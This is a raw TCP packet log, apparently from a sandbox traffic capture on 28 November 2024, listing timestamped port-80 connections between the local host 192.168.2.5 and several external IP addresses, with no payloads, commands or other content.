                                                                        Nov 28, 2024 09:15:07.919492006 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:07.934731960 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:08.054827929 CET80499523.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:09.062696934 CET80499523.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:09.062743902 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:09.435842991 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:09.555727005 CET80499523.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:10.454963923 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:10.574920893 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:10.576744080 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:10.616044044 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:10.736169100 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:11.765135050 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:11.765224934 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:12.123353958 CET4995980192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:12.243777990 CET80499593.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:13.142864943 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:13.262811899 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:13.262897015 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:13.284480095 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:13.404417992 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:13.404602051 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:14.795351028 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:14.915690899 CET80499653.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:14.915757895 CET4996580192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:15.818326950 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:15.938239098 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:15.942745924 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:15.980632067 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:16.100992918 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:17.045238018 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:17.045254946 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:17.045440912 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:17.048515081 CET4997380192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:17.168514967 CET80499733.33.130.190192.168.2.5
                                                                        Nov 28, 2024 09:15:22.419326067 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:22.539345026 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:22.540868998 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:22.555114031 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:22.675128937 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873202085 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873219967 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873284101 CET8049984172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:23.873450041 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:24.064662933 CET4998480192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.080657959 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.200664043 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:25.200741053 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.222577095 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:25.342677116 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.487931013 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.488049984 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.488291979 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:26.488455057 CET8049991172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:26.491477013 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:26.732775927 CET4999180192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:27.751461983 CET4999980192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:27.871656895 CET8049999172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:27.872129917 CET4999980192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:27.887921095 CET4999980192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:28.007942915 CET8049999172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:28.008002996 CET8049999172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:29.245755911 CET8049999172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:29.245919943 CET8049999172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:29.245975018 CET4999980192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:29.246010065 CET8049999172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:29.246078014 CET4999980192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:29.404813051 CET4999980192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:30.423643112 CET5000680192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:30.543572903 CET8050006172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:30.543682098 CET5000680192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:30.552664042 CET5000680192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:30.672523022 CET8050006172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:31.883143902 CET8050006172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:31.883244991 CET8050006172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:31.883521080 CET8050006172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:31.884021997 CET5000680192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:31.888676882 CET5000680192.168.2.5172.67.222.69
                                                                        Nov 28, 2024 09:15:32.008610010 CET8050006172.67.222.69192.168.2.5
                                                                        Nov 28, 2024 09:15:37.851084948 CET5000780192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:37.971100092 CET8050007103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:37.972739935 CET5000780192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:37.988668919 CET5000780192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:38.108624935 CET8050007103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:39.491436958 CET8050007103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:39.491539001 CET8050007103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:39.491584063 CET5000780192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:39.507328987 CET5000780192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:40.517190933 CET5000880192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:40.637401104 CET8050008103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:40.637482882 CET5000880192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:40.655679941 CET5000880192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:40.775646925 CET8050008103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:42.170839071 CET5000880192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:42.222166061 CET8050008103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:42.222182035 CET8050008103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:42.222297907 CET5000880192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:42.222297907 CET5000880192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:42.290951014 CET8050008103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:42.291039944 CET5000880192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:43.197063923 CET5000980192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:43.320076942 CET8050009103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:43.320158958 CET5000980192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:43.337343931 CET5000980192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:43.457509995 CET8050009103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:43.457545996 CET8050009103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:44.842297077 CET5000980192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:44.945220947 CET8050009103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:44.945297956 CET8050009103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:44.945329905 CET5000980192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:44.945363998 CET5000980192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:44.962306023 CET8050009103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:44.962359905 CET5000980192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:45.860796928 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:45.980895042 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:45.981326103 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:45.992675066 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:46.113987923 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.469150066 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.469310045 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.469324112 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.469587088 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.470067978 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.470081091 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.470871925 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.470894098 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.471194029 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.471735001 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.471751928 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.472459078 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.472512007 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.478844881 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.589679003 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.589818954 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.590707064 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.593766928 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.638972044 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.687228918 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.687287092 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.687381029 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.691385031 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.691518068 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.691601038 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.699693918 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:48.699795008 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.703610897 CET5001080192.168.2.5103.249.106.91
                                                                        Nov 28, 2024 09:15:48.823585987 CET8050010103.249.106.91192.168.2.5
                                                                        Nov 28, 2024 09:15:54.213346958 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:54.334681034 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:54.336663961 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:54.352663994 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:54.473283052 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.805223942 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.805290937 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.805541992 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.805630922 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.805732012 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.805844069 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.806163073 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.806325912 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.806411982 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.806941986 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.807471037 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.807548046 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.807777882 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.807991982 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.808037043 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.857763052 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.925668955 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.925803900 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.925831079 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.925937891 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.929929972 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.930033922 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.930082083 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.930134058 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.938571930 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.938621998 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:55.938771963 CET8050011121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:55.938844919 CET5001180192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:56.876332998 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:56.996494055 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:56.996726990 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:57.012895107 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:57.132906914 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.512017012 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.512131929 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.512412071 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.512721062 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.512983084 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.513514996 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.513629913 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.513668060 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.513879061 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.514084101 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.514262915 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.514342070 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.514750957 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.514883995 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.514983892 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.529932022 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.632505894 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.632652998 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.632710934 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.636650085 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.636722088 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.636722088 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.636820078 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.639615059 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.645093918 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.645203114 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:58.645315886 CET8050012121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:58.645477057 CET5001280192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:59.549088001 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:59.669188976 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:59.669275999 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:59.688683987 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:15:59.808856010 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:15:59.808878899 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.158471107 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.158634901 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.158694983 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.159358978 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.159503937 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.159539938 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.160017967 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.160193920 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.160233021 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.160522938 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.160713911 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.160747051 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.161035061 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.161178112 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.161214113 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.185894966 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.278723955 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.278779030 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.278886080 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.278923035 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.282948971 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.282989025 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.283113003 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.283195972 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.291363001 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.291410923 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:01.291523933 CET8050013121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:01.291563034 CET5001380192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:02.204729080 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:02.324851036 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:02.325216055 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:02.334196091 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:02.454178095 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.757971048 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.758352995 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.758719921 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.758936882 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.758956909 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.758980036 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.758985996 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:03.759073019 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.759087086 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:03.759202003 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.759721041 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.759928942 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.760797977 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:03.880698919 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.881036043 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.884845972 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:03.884874105 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.885018110 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.885106087 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:03.893321991 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.893452883 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:03.898600101 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:04.034090996 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:04.036828041 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:04.040682077 CET5001480192.168.2.5121.43.155.35
                                                                        Nov 28, 2024 09:16:04.160758972 CET8050014121.43.155.35192.168.2.5
                                                                        Nov 28, 2024 09:16:09.633563042 CET5001580192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:09.753717899 CET8050015199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:09.756870985 CET5001580192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:09.778213978 CET5001580192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:09.898150921 CET8050015199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:11.036739111 CET8050015199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:11.036860943 CET8050015199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:11.036905050 CET5001580192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:11.279493093 CET5001580192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:12.314682961 CET5001680192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:12.434571981 CET8050016199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:12.434840918 CET5001680192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:12.448820114 CET5001680192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:12.568882942 CET8050016199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:13.712052107 CET8050016199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:13.712178946 CET8050016199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:13.717052937 CET5001680192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:13.954804897 CET5001680192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:14.972187996 CET5001780192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:15.092150927 CET8050017199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:15.092230082 CET5001780192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:15.108933926 CET5001780192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:15.228936911 CET8050017199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:15.229001999 CET8050017199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:16.455202103 CET8050017199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:16.455284119 CET8050017199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:16.456672907 CET5001780192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:16.624670982 CET5001780192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:17.642560005 CET5001880192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:17.762679100 CET8050018199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:17.764811993 CET5001880192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:17.776678085 CET5001880192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:17.896583080 CET8050018199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:19.104046106 CET8050018199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:19.104131937 CET8050018199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:19.104204893 CET5001880192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:19.107369900 CET5001880192.168.2.5199.192.23.123
                                                                        Nov 28, 2024 09:16:19.227480888 CET8050018199.192.23.123192.168.2.5
                                                                        Nov 28, 2024 09:16:24.761337996 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:24.881225109 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:24.881311893 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:24.896471024 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:25.016680002 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:26.085532904 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:26.085570097 CET805001952.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:26.085633993 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:26.404601097 CET5001980192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.423460007 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.545871019 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:27.545958996 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.565336943 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:27.686666965 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:28.752336025 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:28.752351999 CET805002052.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:28.752418995 CET5002080192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:29.076404095 CET5002080192.168.2.552.60.87.163
